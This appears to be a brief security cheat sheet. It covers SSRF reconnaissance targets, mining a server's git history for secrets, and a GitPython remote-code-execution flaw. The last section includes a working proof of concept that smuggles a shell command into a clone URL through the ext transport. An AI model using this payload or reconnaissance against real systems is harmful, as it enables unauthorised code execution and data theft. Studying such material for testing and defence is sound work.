SSRF

Server-side request forgery is a web security vulnerability that allows an attacker to cause the server-side application to make requests to an unintended location. In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization’s infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems. This could leak sensitive data, such as authorization credentials, and locally opened ports.

If there is a SSRF vulnerability, by convention, you should check for the followings:

  • Locally open ports, e.g, 5000, 8080, 8888, 9090
  • API endpoints, e.g, /api/v1, /api, /swagger-ui
  • dot files in server root, e.g, .htaccess, .git

Enum git log

Very often, developers push a repository to the production system using git. Therefore, all the development commit histories will be there on the server too. It is recommended to enum the git logs and compare version by version for sensitive information

> git logs
> git diff version1 version2

GitPython

GitPython is a python library used to interact with Git repositories

Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments. This is only relevant when enabling the ext transport protocol.

In the given example, one can achieve code execution like below

from git import Repo
r = Repo.init('', bare=True)
r.clone_from('ext::sh -c touch% /tmp/pwned', 'tmp', multi_options=["-c protocol.ext.allow=always"])